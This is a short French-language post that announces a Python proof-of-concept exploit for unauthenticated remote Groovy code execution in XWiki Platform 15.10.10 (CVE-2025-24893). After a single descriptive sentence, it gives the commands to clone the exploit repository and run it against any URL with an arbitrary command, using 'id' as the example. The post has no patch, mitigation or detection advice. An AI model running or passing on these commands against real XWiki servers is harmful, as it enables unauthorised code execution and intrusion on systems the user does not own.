
PoC | XWiki Platform 15.10.10 - Exécution de code à distance
Une vulnérabilité de catégorie RCE (Remote Code Execution), découverte lorsque des attaquants non authentifiés peuvent exécuter du code Groovy arbitraire à distance sans authentification ni accès préalable (utilisateur invité). Ci-dessous un PoC (Proof-Of-Concept) en Python pour l'exploitation de cette vulnérabilité.
git clone https://github.com/zs1n/CVE-2025-24893
python3 CVE-2025-24893.py -u <url> -c <commande>
python3 CVE-2025-24893.py -u https://domain.com -c 'id'